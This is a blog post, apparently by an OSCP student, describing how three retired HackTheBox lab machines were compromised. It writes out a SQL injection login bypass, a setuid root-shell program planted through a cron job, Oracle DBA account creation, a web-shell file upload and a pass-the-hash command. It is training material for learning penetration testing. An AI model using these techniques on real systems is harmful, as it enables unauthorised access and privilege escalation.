OSCP Week 16: HackTheBox (Part 4)

I took a break over the weekend and generally relaxed more during the week, so was only able to go through three retired HackTheBox machines. As such, this post will be shorter than usual, but I found some interesting things in these machines so I hope the post is still worthwhile.

CronOS

The hostname for this site wasn’t configured properly, and needed to e guessed. Burp Suite could then be used as a proxy to edit the hostname in the request. This can also be done by editing the host file in /etc/host

Because DNS is running on a TCP port, it suggests zone transfers might be possible. A zone transfer is a great way to find out more information about the host, and can be executed using

dig axfr @10.10.10.13 cronos.htb

SQL injection was required to bypass the login page. There is a pretty great resource available on Pentest Monkey for SQL authentication bypasses, but in this case the username field could be bypasses using

admin’– -‘

wget -r initiates recursive mode – this can be used to fetch all files in a directory. Useful!

Privilege Escalation

This was done by identifying a cron job running as root and modifying it to do create a new setuid bit on an existing file. The file is as follows:

setuid.c

int main(void
{
setuid(0);
setgid(0);
system(“/bin/bash”);
}

It can be compiled using:

gcc setuid.c -o hack -m64

the -m64 flag is necessary to compile the file to run on 64 bit machines, as my Kali Linux VM is 32 bit and defaults as such.

To exploit this laravel cron job to schedule a new command which would change the setuid bit of the above file, use the following command:

$schedule->exec(‘chown root:root /tmp/hack; chmod 4755 /tmp/hack’)->everyMinute();

execute the above file and gain a root shell.

Silo

For this machine, I had to install ODAT, which also came with the application SQLPlus. This allows the user to make connections to Oracle Databases using the following command:

sqlplus scott/tiger@10.10.10.82:1531/XE as sysdba

The ‘as sysdba‘ command functions in a similar way to the sudo command, and ensures you connect to the database with higher privileges. From here you can create a new user account and grant it the same DBA privilege:

CREATE USER kento IDENTIFIED BY kento;

GRANT dba TO kento;

ODAT is a powerful tool that can make hacking Oracle Databases much easier. You can use the –putFile flag using the utlfile module to place a file on the database. Another alternative is to use the

python odat.py utlfile -s 10.10.10.82 -d XE -U kento -P kento –putFile “c:\inetpub\wwwroot\\” “silo.aspx” “/tmp/silo.aspx”

Volatility is another great tool that I hadn’t used before. It’s a memory dump tool that can be useful for data recovery procedures. On this machine, it was used to extract the memory hash required for root login. After obtaining the memory dump, the command for this is as follows:

volatility -f /root/Documents/htb/silo/SILO-20180105-221806.dmp –profile Win2012R2x64 hashdump

After obtaining the hash, it can be used to gain administrator access to the machine using a pass the hash technique:

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd

Sense

Checking the certificate information of a website is a useful way to further enumerate. For example, it is possible to see usernames, email addresses or other useful information from these.

adding .txt as an extension for gobuster directory bruteforcing is potentially useful. Doing so can find interesting files that would otherwise have been missed.

Apologies for a short post, I’ll be committing more time this coming week and will also be attempting some of the active machines, so will hopefully have some more interesting things to write about.

Kento

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s